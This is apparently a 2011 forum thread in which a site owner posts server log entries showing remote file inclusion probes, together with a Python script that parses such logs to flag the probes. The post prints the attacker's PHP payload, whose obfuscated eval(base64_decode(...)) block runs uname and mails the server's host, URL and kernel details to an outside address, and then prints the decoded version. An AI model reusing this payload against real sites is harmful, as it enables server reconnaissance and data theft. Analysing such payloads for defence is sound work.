
What Is This?? Server Log Entry...

Discussion in 'BlackHat Lounge' started by unknown00, Jun 2, 2011.

  1. unknown00

    gigs=http://ibuybid.com/admin/htmlpurifier/configdoc/.svn/tmp/.acces/id.txt?
    IP: 91.121.70.32 |Date:
    -06-2011 / 07:44:21 (Date=0 EDT) libwww-perl/5.803

    gigs=http://ibuybid.com/admin/htmlpurifier/configdoc/.svn/tmp/.acces/id.txt?
    IP: 91.121.70.32 |Date:
    -06-2011 / 07:44:22 (Date=0 EDT) libwww-perl/5.803

    IP: 67.85.53.112 |Date:
    -06-2011 / 07:44:56 (Date=0 EDT) Mozilla/5.0 (PLAYSTATION 3; 1.00)

    gigs=http://ibuybid.com/admin/htmlpurifier/configdoc/.svn/tmp/.acces/id.txt?
    IP: 91.121.70.32 |Date:
    -06-2011 / 07:45:30 (Date=0 EDT) libwww-perl/5.803

    gigs=http://ibuybid.com/admin/htmlpurifier/configdoc/.svn/tmp/.acces/id.txt?
    IP: 91.121.70.32 |Date:
    -06-2011 / 07:45:31 (Date=0 EDT) libwww-perl/5.803

    When I go to the above link I'm prompted to open/download a txt file, which I do...
    and this is what it looks like:

    Code:
    <?
    $win = strtolower(substr(PHP_OS,0,3)) == "win";
    echo "PLaTo<br>";
    if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
    {
     $safemode = true;
     $hsafemode = "4ON6";
    }
    else {$safemode = false; $hsafemode = "3OFF6";}
    $xos = wordwrap(php_uname(),90,"<br>",1);
    $xpwd = @getcwd();
    $OS = "<<".$hsafemode.">> ".$xos."";
    echo "<center><A class=ria href=\"http://".$OS."\">";echo "PLaTo</A></center><br>";
    echo "<br>OSTYPE:$OS<br>";
    echo "<br>Pwd:$xpwd<br>";
    eval(base64_decode("aWYgKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSBvciBzdHJ0b2xvd2VyKEBpbmlfZ2V0KCJzYWZlX21v
    ZGUiKSkgPT0gIm9uIikgeyAkc2FmZW1vZGUgPSAiT04iOyB9IGVsc2UgeyAkc2FmZW1vZGUgPSAi
    T0ZGIjsgfSAkdmlzaXRvciA9ICRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOyAkZmxvYXQgPSAiRnJv
    bSA6IHZ1cmwgaW5mbyA8ZnVsbEBpbmZvLmNvbT4iOyAkYXJhbiA9IGV4ZWMoJ3VuYW1lIC1hOycp
    OyAkd2ViID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdOyAkaW5qID0gJF9TRVJWRVJbIlJFUVVFU1Rf
    VVJJIl07ICRib2R5ID0gIkJ1ZyBodHRwOi8vIi4kd2ViLiRpbmouIm5uU3ByZWFkIFZpYSA6ICIu
    JHZpc2l0b3IuIm5uS2VybmVsIFZlcnNpb24gOiAiLiRhcmFuLiJublNhZmUgTW9kZSA6ICIuJHNh
    ZmVtb2RlOyBtYWlsKCJnd2FkdWtAZ21haWwuY29tIiwiU2V0b3JhbiBCb3MgIi4kc2FmZW1vZGUs
    JGJvZHksJGZsb2F0KTs="));
    die("<center> ByroeNet </center>");
    ?>
    When I decode the base64, this is what I get:

    Code:
    if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "ON"; } else { $safemode = "OFF"; } $visitor = $_SERVER["REMOTE_ADDR"]; $float = "From : vurl info <full@info.com>"; $aran = exec('uname -a;'); $web = $_SERVER["HTTP_HOST"]; $inj = $_SERVER["REQUEST_URI"]; $body = "Bug http://".$web.$inj."nnSpread Via : ".$visitor."nnKernel Version : ".$aran."nnSafe Mode : ".$safemode; mail("gwaduk@gmail.com","Setoran Bos ".$safemode,$body,$float);
    Should I be worried???
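
A triage sketch for the log layout shown in the post, added here as an example and not part of the original thread: it parses the three-line records and groups requests whose parameter value is a remote URL (the pattern in the `gigs=http://...` entries) by source IP. The sample log, hosts and IPs are constructed, and the function names are hypothetical.

```python
import re
# Constructed sample in the post's three-line layout (documentation IPs, example hosts).
SAMPLE_LOG = """\
gigs=http://remote.example/tmp/id.txt?
IP: 192.0.2.10 |Date:
-06-2011 / 07:44:21 (Date=0 EDT) libwww-perl/5.803

IP: 198.51.100.7 |Date:
-06-2011 / 07:44:56 (Date=0 EDT) Mozilla/5.0 (PLAYSTATION 3; 1.00)

gigs=http://remote.example/tmp/id.txt?
IP: 192.0.2.10 |Date:
-06-2011 / 07:45:30 (Date=0 EDT) libwww-perl/5.803

page=about.php
IP: 203.0.113.5 |Date:
-06-2011 / 07:46:02 (Date=0 EDT) Mozilla/5.0 (Windows NT 6.1)
"""

PARAM_RE = re.compile(r"^(?P<name>[\w\[\]]+)=(?P<value>.*)$")
IP_RE = re.compile(r"^IP:\s*(?P<ip>\S+)\s*\|Date:")
STAMP_RE = re.compile(r"^\S*\s*/\s*(?P<time>\d\d:\d\d:\d\d)\s*\(.*?\)\s*(?P<ua>.*)$")
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.I)  # value is an absolute URL

def parse_records(text):
    """Yield one dict per blank-line-separated record; the parameter line is optional."""
    for block in re.split(r"\n\s*\n", text.strip()):
        rec = {"params": {}, "ip": None, "time": None, "ua": None}
        for line in (ln.strip() for ln in block.splitlines()):
            if m := IP_RE.match(line):
                rec["ip"] = m["ip"]
            elif m := STAMP_RE.match(line):
                rec["time"], rec["ua"] = m["time"], m["ua"]
            elif m := PARAM_RE.match(line):
                rec["params"][m["name"]] = m["value"]
        if rec["ip"]:
            yield rec

def rfi_probes(text):
    """Map source IP -> [(time, parameter, remote URL, user agent)] for inclusion probes."""
    hits = {}
    for rec in parse_records(text):
        for name, value in rec["params"].items():
            if REMOTE_RE.match(value):
                hits.setdefault(rec["ip"], []).append((rec["time"], name, value, rec["ua"]))
    return hits

if __name__ == "__main__":
    print(rfi_probes(SAMPLE_LOG))
```

A match only shows that the parameter was probed. Whether the include could have succeeded depends on how the script uses that parameter and on the PHP `allow_url_include` and `allow_url_fopen` settings.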
     
  2. unknown00

    No one has an idea??